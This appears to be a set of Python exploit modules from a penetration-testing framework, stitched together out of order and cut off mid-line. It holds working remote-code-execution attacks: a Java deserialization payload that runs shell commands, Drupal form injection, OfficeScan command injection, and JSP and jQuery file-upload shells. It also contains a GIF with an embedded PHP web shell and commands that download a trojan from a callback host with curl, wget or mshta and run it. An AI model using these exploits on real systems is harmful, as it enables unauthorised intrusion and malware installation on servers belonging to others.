def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.sslport = int(self.argsDict.get("sslport", self.sslport))
self.https = int(self.argsDict.get("https", self.https))
self.basepath = self.argsDict.get("basepath", self.basepath)
self.cmd = self.argsDict.get("cmd", self.cmd)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.maketrojan()
self.TROJANMODE = 1
self.cmd = "rm -f /tmp/" + self.trojanname + "; /usr/bin/curl -o /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; /bin/chmod 777 /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
ua.addHeader(
"User-Agent",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
)
ua.addHeader("Content-Type", "text/xml")
# Exploitation
params = """<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string>
<string>-c</string>
<string>%s</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>""" % self.cmd
url = "/ws/rest/v1/d2"
mainurl = "%s://%s:%d/%s%s" % (self.protocol, self.host, self.port,
self.basepath, url)
data = ua.POST(mainurl, params)
if self.TROJANMODE == 0:
self.log('[D2] %s' % (data.split('<!DOCTYPE html>')[0]))
return 1
def upload_file(self):
# Open JSP file
f = open(self.filename, "r")
fdata = f.read()
f.close()
fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))
json = """
{
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"geometry": {
"type": "LineString",
"coordinates": [
[
1.061553955078125,
48.3416461723746
],
[
5.719757080078125,
48.2246726495652
],
[
3.434600830078125,
45.21300355599396
],
[
1.061553955078125,
48.3416461723746
]
]
},
"properties": {}
}
]
}
"""
fdata = json+fdata
if self.https == 0:
self.protocol = "http"
else:
self.protocol = "https"
self.port = self.sslport
ua = spkproxy.UserAgent("", exploit=self)
# Upload JSP file
params = '-----------------363752669374944\r\nContent-Disposition: form-data; name="fileName"\r\n\r\n../../../../d2.jsp\r\n-----------------363752669374944\r\nContent-Disposition: form-data; name="layerFile"\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------363752669374944--\r\n'%(len(fdata), fdata)
url = '/mapviewer/addmapdata'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
ua.addHeader("Content-Type", "multipart/form-data; boundary=---------------363752669374944")
ua.addHeader("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1")
data = ua.POST(mainurl, params)
# Execute uploaded JSP file
url = "/mapviewer/d2.jsp"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
return 1
def __init__(self):
canvasexploit.__init__(self)
#hostname="http://google.com"
#elf.hostname=hostname
self.ua = spkproxy.UserAgent("") #placeholder
self.name = ""
#self.ssl=""
self.webserverport = 0 #set to non-zero to make it an RFI exploit
self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+\
"""<?php
error_reporting(0);
ini_set('max_execution_time',0);
print 'startz';
passthru(base64_decode($_REQUEST[SERVER_INFO]));
eval(base64_decode($_REQUEST[SERVER_INFO2]));
print 'endz';
exit;
?>"""+\
chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)
self.log_paths = [
"../../../../../var/log/apache2/access.log",
"../../../../../var/log/apache2/error.log",
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log", "../apache/logs/access.log",
"../../apache/logs/error.log", "../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log", "../logs/error.log",
"../logs/access.log", "../../logs/error.log",
"../../logs/access.log", "../../../logs/error.log",
"../../../logs/access.log", "../../../../logs/error.log",
"../../../../logs/access.log", "../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log",
"../../../../../../var/log/apache2/error.log"
]
def start(self, widget):
self.treestore_3.clear()
hostentry = self.wTree2.get_widget("selectedhost")
self.qhost = hostentry.get_text()
if self.qhost == "":
self.log("[D2 LOG] ERROR: Nessus Server IP is empty")
return
portentry = self.wTree2.get_widget("serverport")
self.port = portentry.get_text()
if self.port == "":
self.log("[D2 LOG] ERROR: Nessus Server port is empty")
return
loginentry = self.wTree2.get_widget("login")
self.login = loginentry.get_text()
if self.login == "":
self.log("[D2 LOG] ERROR: Nessus login is empty")
return
pwdentry = self.wTree2.get_widget("password")
self.password = pwdentry.get_text()
if self.password == "":
self.log("[D2 LOG] ERROR: Nessus password is empty")
return
postdata = {
'username': self.login,
'password': self.password,
}
urldata = json.dumps(postdata)
mainurl = "https://" + self.qhost + ":" + self.port
headers = [("Content-Type", "application/json")]
# Login and get token
UA = spkproxy.UserAgent(mainurl, exploit=self)
data = UA.POST(self.loginurl, data=urldata, extraheaders=headers)
response = json.loads(data)
if "token" not in response:
self.log("[D2 LOG] Nessus ACCESS DENIED")
return
self.token = response["token"]
UA.addHeader("X-Cookie", "token=%s" % self.token)
# Get scan list
data = UA.GET(self.scanurl)
response = json.loads(data)
# Download scan list and update treeview
if "scans" not in response:
self.log("[D2 LOG] No scan available")
return
for scan in response["scans"]:
self.treestore_3.append(None, [
scan["name"],
time.strftime("%a, %d %b %Y %H:%M:%S",
time.gmtime(int(scan["creation_date"]))),
scan["id"]
])
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.sslport = int(self.argsDict.get("sslport", self.sslport))
self.https = int(self.argsDict.get("https", self.https))
self.basepath = self.argsDict.get("basepath", self.basepath)
self.cmd = self.argsDict.get("cmd", self.cmd)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.maketrojan()
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname
self.cmd += "&& chmod 777 /tmp/" + self.trojanname
self.cmd += "&& /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
if self.https == 0:
self.protocol = "http"
else:
self.protocol = "https"
self.port = self.sslport
ua = spkproxy.UserAgent("", exploit=self)
url = "/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]="
mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port,
self.basepath, url,
urllib.quote(self.cmd))
params = urllib.urlencode({
'_triggering_element_name': 'name',
'form_id': 'user_pass'
})
data = ua.POST(mainurl, params)
m = re.search('name="form_build_id" value="([^"]+)"', data)
if m is None:
self.log('[D2] form_build_id not found')
return 0
form_build_id = m.group(1)
url = "/?q=file/ajax/name/%23default_value/"
mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port,
self.basepath, url, form_build_id)
params = urllib.urlencode({'form_build_id': form_build_id})
data = ua.POST(mainurl, params)
if self.TROJANMODE == 0:
m = re.search('(.+?)\\[\\{"command":"settings","settings"', data,
re.DOTALL)
if m is not None:
self.log('[D2] %s' % m.group(1).strip())
else:
self.log(data)
return 1
def download(self, widget):
self.SelectedScan = []
column_names = ['Name', 'Date', 'Reference']
gladefile = self.exploitpath + "simple2.glade"
self.wTree2 = gtk.glade.XML(gladefile)
dic = {"on_start_clicked" : self.start,
"on_delreport_toggled" : self.activatedel,
"on_deselectall_clicked" : self.deselectall,
"on_selectall_clicked" : self.selectall}
self.wTree2.signal_autoconnect(dic)
self.loaddlg = self.wTree2.get_widget("exploit_dialog")
try:
self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
except:
pass
# Init reports treeview
self.treeview_3 = self.wTree2.get_widget("mytree")
self.treestore_3 = gtk.TreeStore(str, str, str)
self.treeview_3.set_show_expanders(False)
self.treeview_3.set_model(self.treestore_3)
self.treeselection = self.treeview_3.get_selection()
self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
column = [None] * len(column_names)
column[0] = gtk.TreeViewColumn(column_names[0], gtk.CellRendererText(), text=0)
column[0].set_resizable(True)
column[0].set_sort_column_id(0)
column[1] = gtk.TreeViewColumn(column_names[1], gtk.CellRendererText(), text=1)
column[1].set_resizable(True)
column[1].set_sort_column_id(1)
column[2] = gtk.TreeViewColumn(column_names[2], gtk.CellRendererText(), text=2)
column[2].set_resizable(True)
column[2].set_sort_column_id(2)
self.treeview_3.append_column(column[0])
self.treeview_3.append_column(column[1])
self.treeview_3.append_column(column[2])
# Start downloader dialog
result = self.loaddlg.run()
if (result == gtk.RESPONSE_OK):
if (self.treeselection.count_selected_rows() > 0):
model, paths = self.treeselection.get_selected_rows()
for p in paths:
iter = self.treestore_3.get_iter(p)
tmpRef = model.get_value(iter, 2)
self.SelectedScan.append(tmpRef)
for ref in self.SelectedScan:
postdata = {
'login': self.login,
'password': self.password,
'submit': 'submit'
}
urldata = urllib.urlencode(postdata)
mainurl = "https://" + self.qhost + ":" + self.port
UA = spkproxy.UserAgent(mainurl, exploit=self)
UA.POST(self.loginurl, data=urldata)
postdata = {
'report': ref,
'submit': 'submit'
}
urldata = urllib.urlencode(postdata)
data = UA.POST(self.reporturl, data=urldata)
if "you are not authorized to perform this request" in data.lower():
self.log("[D2 LOG] Nessus ACCESS DENIED")
continue
if not os.path.exists(self.exploitpath + "reports/"):
os.mkdir(self.exploitpath + "reports/")
filename = self.exploitpath + "reports/" + ref.replace("/", "_")
f = open(filename, "w")
f.write(data)
f.close()
self.ReportFiles.append(filename);
self.treestore_2.append(None, [filename])
else:
self.log("[D2 LOG] - No Nessus report selected")
self.loaddlg.destroy()
def run(self):
self.getargs()
#test = self.test()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.hostname, self.port))
logging.info("Attacking %s:%d" % (self.hostname, self.port))
logging.info("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
auth = None
if self.basicauth_user != "":
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
fname_shell = randomstring(
16
) + ".php" #''.join(random.choice(string.ascii_letters) for _ in range(16)) #
fname_multipart_data = self.getfile(fname_shell)
found_path = False
useragentstring = ''
vulnerable_path = ''
for jquery_path in self.jquery_paths:
useragentstring = protocol + "://" + self.host + ":" + str(
self.port) + "/" + self.basepath
UA = spkproxy.UserAgent(useragentstring,
auth=auth,
hostname=self.hostname,
exploit=self)
for vulpath in self.vulnpaths:
UA.addHeader(
"Content-Type",
"multipart/form-data; boundary=---------------------------3922242971797626524322043819"
)
vulnerable_path = jquery_path + vulpath
logging.info(
"Checking for vulnerable path: {}".format(useragentstring +
vulnerable_path))
response, response_code = UA.POST(vulnerable_path,
fname_multipart_data,
return_response_code=True)
if response_code == 200:
found_path = True
break
vulnerable_path = jquery_path + vulpath + "/" + randomstring(
10)
logging.info(
"Checking for vulnerable path: {}".format(useragentstring +
vulnerable_path))
response, response_code = UA.POST(vulnerable_path,
fname_multipart_data,
return_response_code=True)
if response_code == 200:
found_path = True
break
if found_path:
logging.warning(
"Found vulnerable path: {}".format(useragentstring +
vulnerable_path))
break
# Wait for the upload
time.sleep(3)
ret = 0
if found_path:
UA.clearHeaders()
for upload_path in self.upload_paths:
test_path = jquery_path + upload_path + fname_shell
logging.info("Triggering our uploaded callback: {}".format(
useragentstring + test_path))
UA.GET(test_path, noresponse=True)
for i in xrange(0, 5): #wait five seconds for callback
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if ret:
break
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.maketrojan()
self.TROJANMODE = 1
self.cmd = "mshta.exe http://" + self.callback.ip + "/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = "%s>repository/widgetPool/wp1/proxy/modTMCSS/d2" % self.argsDict.get(
"cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
ua.addHeader(
"User-Agent",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
)
# Init
url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0016"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
# Get LoginTicket
url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0009"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
m = re.search('"LoginTicket" : ([0-9]+)', data)
if m is None:
self.log("[D2SEC] LoginTicket not found")
return 0
loginticket = m.group(1)
# Create encrypted password
m = hashlib.md5()
m.update(self.password)
md5 = m.hexdigest()
txt = md5 + loginticket
n = hashlib.sha256()
n.update(txt)
sha256 = n.hexdigest()
# Authentication
url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'TxtAccount': self.username,
'TMlogonEncrypted': sha256
})
data = ua.POST(mainurl, params)
if "unable" in data:
self.log("[D2SEC] Authentication error")
return 0
# Init cookies
url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0010"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
url = "/officescan/console/html/widget/index.php"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
# Exploitation
url = "/officescan/console/html/widget/proxy_controller.php"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'module': 'modTMCSS',
'serverid': '1',
'T': 'D2 & %s' % self.cmd
})
data = ua.POST(mainurl, params)
self.log("[D2SEC] %s" % data)
if self.TROJANMODE == 0:
url = "/officescan/console/html/widget/repository/widgetPool/wp1/proxy/modTMCSS/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port,
url)
data = ua.GET(mainurl)
self.log("[D2SEC] %s" % data)
return 1
def run(self):
self.getArgs()
useragentstring = "https://" + self.host + ":%s" % self.port + "/"
UA = spkproxy.UserAgent(useragentstring,
auth=None,
hostname=self.host,
exploit=self)
self.log("WP> Sending Exploit Stage 1 - Authentication Bypass")
data = UA.POST("login.php",
"button=Login&attempt=1&uname=-%s" % wp_randomstring(1),
extraheaders=None,
noresponse=False)
eval_file = "_" + wp_randomstring(4) + "_" + ".php"
eval_code = wp_randomstring(
1
